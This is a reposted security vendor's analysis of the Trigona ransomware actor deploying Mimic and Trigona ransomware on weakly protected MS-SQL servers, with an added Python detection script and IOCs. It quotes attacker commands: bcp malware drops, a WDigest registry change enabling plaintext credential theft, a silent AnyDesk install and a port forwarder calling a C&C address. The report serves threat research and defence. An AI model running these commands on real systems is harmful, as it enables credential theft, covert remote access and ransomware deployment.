Trigona Ransomware Threat Actor Uses Mimic Ransomware

AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for exploiting the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process.

  • Trigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.
  • Mimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].

ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead of Mimic. The threat actor’s email address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023 [4].

Accordingly, the attack detected in mid-January 2024 is thought to be launched by the previous Trigona threat actor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early January 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used for malware installation, and the various strings and paths used in attacks were the same. In addition, the same malware was used in each attack case.

1. Trigona Ransomware

Trigona ransomware is developed in Delphi and uses RSA and AES encryption algorithms when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona attacking the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, in April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].

MS-SQL servers were targeted again in the recent attack case, as in the 2023 cases, and the threat actor’s email address saved in the ransom note confirms that the threat actor behind the recently detected Trigona ransomware is the same attacker responsible for the previous cases.

  • Email: farusbig@tutanota[.]com
  • URL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
Figure 1. Encrypted files and ransom note

2. Mimic Ransomware

Mimic ransomware is known for exploiting a file search program called Everything while looking for files to encrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the target system. The attacker also copied some features of Conti ransomware, whose source code was leaked, during the development stage [7].

The Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report released in January 2024 have almost the same external structure as the one used in this attack. The malware was made into a 7z SFX executable and contains a compressed file named “Everything64.dll”, which is a password-protected archive of the actual malware files and the Everything tool. When the malware is executed, the 7z SFX and the “Everything64.dll” archive are decompressed using the respective passwords as shown below.

> 7za.exe x -y -p58042791667523172 Everything64.dll
> 7za.exe x -y -p624417568130113444 Everything64.dll
Figure 2. Files included in 7z SFX and the compressed file

The folder that is ultimately installed not only contains Mimic ransomware and the Everything tool, but also the Defender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) of Sysinternals.

Figure 3. Installed files

The threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples in the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack cases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in their attacks based on multiple circumstances that will be discussed later in this post.

Figure 4. Encrypted files and ransom note

3. Malware Installed Using BCP

Attack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account credentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the fact that the Trigona ransomware threat actor has been targeting these systems in attacks from the past, but also from infection logs of malware including LoveMiner and Remcos RAT from before and after the respective attack processes.


3.1. Files Created Using BCP

The BCP utility bcp.exe is a command line tool used to bulk import or export large volumes of data on MS-SQL servers. It is generally used to export large amounts of data stored in SQL Server tables to a local file, or to import data files on the local system into SQL Server tables.

Threat actors that target MS-SQL servers typically use PowerShell commands to download malware. Recently, some have been exploiting SQLPS, a PowerShell tool included in SQL servers [8]. In this attack case, however, the threat actor most likely saved their malware in a database table and used BCP to write it out as a local file.

Figure 5. Malware created using BCP

The threat actor used the following command in “uGnzBdZbsi”, the table containing the Trigona ransomware binary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain format information.

Figure 6. BCP command used in the attacks

The following are BCP commands used to export various malware and tools used in the attacks.

  • AnyDesk
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\AD.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
  • Port forwarder malware
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\4.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
  • Launcher malware
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\pp2.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\pp2.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
  • Mimic ransomware
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\K2K.txt" -T -f "C:\ProgramData\FODsOZKgAU.txt"
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\K3K.txt" -T -f "C:\users\%ASD%\FODsOZKgAU.txt"
  • Trigona ransomware
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\build.txt" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
  • Others
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\kkk.bat" -T -f "C:\ProgramData\FODsOZKgAU.txt"
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\kur.bat" -T -f "C:\ProgramData\FODsOZKgAU.txt"
    > bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\kkk.bat" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"


3.2. Looking Up Information

Once access succeeds, the first commands the threat actor executes, before creating the malware with BCP, are those that look up the infected system’s information as shown below. The threat actor then installs malware suited to the environment based on the information gained through these commands.

> hostname
> whoami
> wmic computersystem get domain
> wmic computersystem get totalphysicalmemory


3.3. Stealing Account Credentials

The Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. While no logs of Mimikatz were found in the attack process, the attacker sometimes executed a command that sets the UseLogonCredential registry value so that plaintext passwords can be obtained through the WDigest security package.

> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
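To make sections 3.1 to 3.3 actionable for a SOC, the following is an added example (my own code, not ASEC's) of detection logic run over constructed process-creation events: it flags bcp.exe "queryout" writes to disk, recon commands spawned by sqlservr.exe, and the WDigest UseLogonCredential change. The events, the user name "dbadmin" and the sqlservr.exe install path are assumptions; the command lines mirror those quoted above.

```python
"""Detection logic for the MS-SQL server tradecraft quoted in sections 3.1-3.3.
Added example, not ASEC's code; the events below are constructed telemetry."""
import re

# Parent process that should never be spawning recon or file-export commands.
SQL_PARENT = re.compile(r"\\sqlservr\.exe$", re.IGNORECASE)
# bcp ... queryout <path>: capture where the table contents are being written.
BCP_QUERYOUT = re.compile(r'\bbcp(?:\.exe)?\b.*\bqueryout\s+"?([^"\s]+)', re.IGNORECASE)
# Drop locations seen in the post: C:\ProgramData and a user's Music folder.
SUSPICIOUS_DIR = re.compile(r"\\(?:programdata|users\\[^\\]+\\music)\\", re.IGNORECASE)
# Section 3.2 lookups.
RECON = re.compile(r"\b(?:hostname|whoami|wmic\s+computersystem\s+get)\b", re.IGNORECASE)
# Section 3.3: WDigest UseLogonCredential set to 1.
WDIGEST_ON = re.compile(
    r"\breg(?:\.exe)?\s+add\b.*\\wdigest\b.*\bUseLogonCredential\b.*/d\s+(?:0x0*)?1\b",
    re.IGNORECASE,
)

# Constructed events (parent image, command line). "dbadmin" and the install
# paths are assumptions; the command lines mirror those quoted in the post.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"parent": SQLSERVR, "cmdline": "cmd.exe /c hostname"},
    {"parent": SQLSERVR, "cmdline": "wmic computersystem get totalphysicalmemory"},
    {"parent": SQLSERVR, "cmdline": r'bcp "select binaryTable from uGnzBdZbsi" queryout '
                                    r'"C:\ProgramData\pp2.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"'},
    {"parent": CMD, "cmdline": r'bcp "select binaryTable from uGnzBdZbsi" queryout '
                               r'"C:\users\dbadmin\music\build.txt" -T -f "C:\users\dbadmin\music\FODsOZKgAU.txt"'},
    {"parent": SQLSERVR, "cmdline": r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" '
                                    r'/v UseLogonCredential /t REG_DWORD /d 0x00000001'},
    # Benign: a DBA's scheduled table export, run from a shell, to a plain data file.
    {"parent": CMD, "cmdline": r'bcp Sales.dbo.Orders out "D:\exports\orders.dat" -T -n'},
]


def analyze(events):
    """Return (rule, severity, detail) tuples for every matching event."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        from_sql = bool(SQL_PARENT.search(ev["parent"]))
        m = BCP_QUERYOUT.search(cmd)
        if m:
            out_path = m.group(1)
            odd_place = bool(SUSPICIOUS_DIR.search(out_path))
            exec_ext = out_path.lower().endswith((".exe", ".bat", ".dll"))
            # bcp itself is a legitimate DBA tool; the signal is the SQL Server
            # process spawning it, or the output landing where the droppers did.
            if from_sql or odd_place or exec_ext:
                findings.append(("bcp_queryout_file_drop", "high", out_path))
        if from_sql and RECON.search(cmd):
            findings.append(("sqlservr_spawned_recon", "medium", cmd))
        if WDIGEST_ON.search(cmd):
            findings.append(("wdigest_uselogoncredential_enabled", "high", cmd))
    return findings


def count_by_rule(findings):
    """Summarise findings as {rule: count} for a quick triage view."""
    counts = {}
    for rule, _severity, _detail in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, severity, detail in analyze(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {detail}")
```

Tune the parent-process check to your own EDR or Sysmon field names; Event ID 1 (ParentImage, CommandLine) carries exactly what this logic needs.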


3.4. AnyDesk

In addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows a user to remotely access an environment installed with RDP or AnyDesk and control it in the GUI environment.

AnyDesk is a major remote administration tool exploited not only by the aforementioned Trigona ransomware attacker, but also by most threat groups. There are many cases where remote administration tools are used for legitimate purposes such as working from home or remote control and management. Accordingly, anti-malware products cannot simply detect and block these tools, unlike typical malware. Threat actors take advantage of this fact to install remote administration tools instead of RAT-type malware during the initial access or lateral movement phases to control the target system.

> %SystemDrive%\users\%ASD%\music\AD.exe --install C:\"Program Files (x86)"\ --silent

> %SystemDrive%\"Program Files (x86)"\AnyDesk-ad_1514b2f9.exe --get-id


4. Analysis of Malware Used in the Attack

Besides the use of BCP, another notable fact about the recently confirmed attack cases is that there is evidence of safe mode being utilized. Two additional malware samples deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.

One is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.

According to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.

Figure 7. Malware created by the threat actor with similar PDB information

Although no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command were identified as shown below. As the launcher deactivated the safe mode boot option after executing the malware given as an argument, it is likely that the threat actor installed the malware and then rebooted the system in safe mode to run the ransomware.

> shutdown -r -f -t 5

4.1. Launcher Malware

The threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher copies itself into the “C:\windows\temp\LeVfeNXHoa” path. It then carries out the next task according to the given argument. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.

> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE

The launcher registers itself as a service under the name “1111111” which was given as the first argument and runs additional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to be booted up normally again.

Figure 8. Routine of setting the safe mode option for the registered service and deactivating this option after executing the ransomware

4.2. Port Forwarder

The threat actor gave the following argument to execute the port forwarder malware. Port forwarding is a feature where data transmitted from a certain port is forwarded to another port. This malware supports port forwarding to the RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the threat actor cannot directly access the NAT environment from outside.

The port forwarder first connects to the threat actor’s address using the reverse connection method and then connects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able to establish an RDP connection even if the target system is running in a NAT environment, allowing them to control the infected system remotely. Because RDP is utilized in this manner, malware may execute the following commands to additionally enable the RDP service.

Figure 9. RDP service activation routine

When the port forwarder is executed in installation mode, it copies itself into the “C:\windows\temp\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware above.

> %SystemDrive%\users\%ASD%\music\4.exe --ip "2.57.149[.]233" --port "3366" --install

The port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C&C server given as an argument to support port forwarding.

Argument      Description
--install     Installation mode
--uninstall   Uninstallation mode
--run         Execution mode
--ip          C&C server’s IP address
--port        C&C server’s port number
Table 1. Port forwarder arguments

Before connecting to the C&C server, it saves basic system information such as the OS info and user and computer names in the “C:\windows\temp\elZDk6geQ8” path, transmitting the information upon the initial connection.

Figure 10. System information forwarded to the C&C server

Then, it can perform port forwarding or auto-deletion commands based on the commands it receives from the C&C server.

Command       Feature
0x8CC03FAF    Start port forwarding between the C&C server and the RDP service
0x0002C684    Auto-delete
Table 2. Port forwarder commands

5. Conclusion

Recently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely.

Ransomware threat actors encrypt infected systems and steal sensitive information, then threaten the victims with its disclosure to extort payment. Because they employ various techniques for account credential theft and lateral movement, not only single systems but the entire internal company network may be compromised, resulting in sensitive data being stolen and systems across the network being encrypted.

Typical attacks that target MS-SQL servers include brute force and dictionary attacks against systems where account credentials are poorly managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect database servers from brute force and dictionary attacks.

V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware can occur.

File Detection
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574265 (2024.01.14.03)

Behavior Detection
– Malware/MDP.Minipulate.M71
– Persistence/MDP.AutoRun.M203
– DefenseEvasion/MDP.ModifyRegistry.M1234
– Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367

IOC
MD5

– a24bac9071fb6e07e13c52f65a093fce: Launcher (pp2.exe)

– a6e2722cff3abb214dc1437647964c57: Launcher (pp2.exe)

– 3e26e778a4d28003686596f988942646: Port Forwarder (4.exe)

– d6b4b1b6b0ec1799f57142798c5daf5b: Mimic Ransomware Dropper (K2K.exe)

– 6d44f8f3c1608e5958b40f9c6d7b6718: Mimic Ransomware Dropper (K3K.exe)

– b3c8d81d6f8d19e5c07e1ca7932ed5bf: Mimic Ransomware (K2K.exe)

– a02157550bc9b491fd03cad394ccdfe7: Mimic Ransomware (3usdaa.exe)

– c28b33f7365f9dc72cc291d13458f334: Trigona Ransomware (build.txt)

– ac34ba84a5054cd701efad5dd14645c9: Defender Control (DC.exe)

C&C
– 2.57.149[.]233:3366

Originally published by ASEC: Trigona Ransomware Threat Actor Uses Mimic Ransomware. Reposted February 6, 2024.